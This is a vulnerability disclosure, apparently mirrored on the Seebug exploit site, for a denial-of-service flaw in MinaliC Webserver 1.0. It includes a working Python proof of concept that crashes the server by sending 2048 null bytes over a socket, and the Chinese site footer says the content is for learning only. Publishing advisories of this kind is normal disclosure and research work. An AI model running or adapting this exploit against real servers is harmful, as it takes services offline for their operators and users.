# ------------------------------------------------------------------------ # Software................MinaliC Webserver 1.0 # Vulnerability...........Denial Of Service # Download................http://sourceforge.net/projects/minalic/ # Release Date............10/24/2010 # Tested On...............Windows XP # ------------------------------------------------------------------------ # Author..................John Leitch # Site....................http://www.johnleitch.net/ # Email...................john.leitch5@gmail.com # ------------------------------------------------------------------------ # # --Description-- # # Sending a request with a length greater than or equal to 2048 bytes # causes the server to crash. # # # --PoC-- import socket host = 'localhost' port = 8080 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send('\x00'*2048)
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论